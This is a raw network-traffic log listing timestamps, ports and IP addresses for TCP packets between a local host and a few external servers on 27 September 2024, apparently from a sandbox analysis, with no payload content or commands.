Sep 27, 2024 04:21:17.829797029 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829808950 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829822063 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829832077 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829838037 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829843998 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829849005 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.829878092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.829898119 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.843765020 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:17.848571062 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.854180098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854192972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854203939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854244947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854257107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854268074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854331017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.854331017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.854481936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854494095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.854527950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.854630947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.856828928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856838942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856849909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856861115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856870890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856913090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856920958 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.856923103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856937885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.856961012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.856961012 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857004881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857016087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857017994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857033014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857044935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857054949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857065916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857074976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857105017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857105017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857121944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857192993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857203007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857224941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857253075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857265949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857301950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857301950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857331038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857342005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857352972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.857395887 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.857395887 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.871093988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871113062 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871123075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871150017 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871179104 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871190071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871201038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871232033 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871248007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871259928 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871284962 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871315956 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871360064 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871370077 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871392965 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871404886 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871404886 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871416092 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871432066 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871443987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871448040 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871453047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871463060 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871473074 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871475935 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871484041 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871498108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871504068 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871507883 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871521950 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871526003 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871532917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871555090 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871565104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871575117 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871577024 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871597052 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871625900 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871640921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871651888 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871661901 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871674061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871680021 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871685982 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871690035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871718884 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871759892 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871763945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871774912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871784925 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871804953 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871838093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871838093 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871848106 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871859074 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871872902 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871896029 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.871932030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.871970892 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872163057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872191906 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872201920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872210026 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872242928 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872258902 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872273922 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872286081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872294903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872297049 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872306108 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872318029 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872328043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872330904 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872365952 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872410059 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872420073 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872431040 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872442007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872453928 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872477055 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872478008 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872488976 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872498989 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872534990 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872549057 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872559071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872569084 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872581959 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872591972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872597933 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872621059 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872703075 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872713089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872723103 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872747898 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872761011 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872762918 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872771978 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872781992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872796059 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872797012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872807026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.872819901 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.872853994 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874089003 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874130964 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874138117 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874152899 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874171972 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874197960 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874212980 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874222040 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874233007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874243021 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874244928 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874257088 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.874279022 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.874313116 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.875545025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875556946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875566959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875627995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.875628948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.875638962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875650883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875662088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875672102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.875691891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.875691891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.875894070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876789093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876832962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876841068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876864910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876879930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876890898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876905918 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876929045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876938105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876938105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876940012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876955032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876965046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.876980066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.876980066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.877078056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.910983086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.910995007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911005020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911036968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911047935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911058903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911067963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.911067963 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.911070108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911082029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.911149025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.913203955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913223028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913233042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913285971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.913285971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.913321972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913332939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913343906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913357973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913369894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.913388014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.913388014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.914650917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.916536093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916590929 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916667938 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916677952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916696072 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916703939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916712046 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916822910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916832924 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916845083 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916851997 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916855097 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916865110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916874886 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916876078 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916886091 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916898966 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916908026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916909933 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916918993 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916928053 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916932106 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916939020 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916949987 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.916949987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916960955 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916971922 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.916974068 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917000055 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917013884 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917025089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917035103 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917040110 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917045116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917053938 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917081118 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917089939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917099953 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917109966 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917125940 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917129040 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917138100 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917144060 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917146921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917171955 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917197943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917208910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917239904 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917248011 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917258024 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917267084 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917278051 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917300940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917371988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917382956 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917393923 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917404890 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917412043 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917414904 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917424917 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917448044 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917454958 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917464972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917475939 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917495012 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917505026 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917517900 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917526960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917546988 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917547941 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917560101 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917576075 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917691946 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.917702913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917712927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917722940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917738914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.917742968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917768955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917787075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917797089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917799950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917799950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917808056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917819023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917845964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917845964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917900085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917911053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917939901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.917978048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917989016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.917999029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.918016911 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.918016911 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.918047905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.918082952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.918092966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.918102026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.918142080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.918142080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.919214964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919225931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919236898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919260025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.919270992 CEST	80	49725	185.215.113.117	192.168.2.5
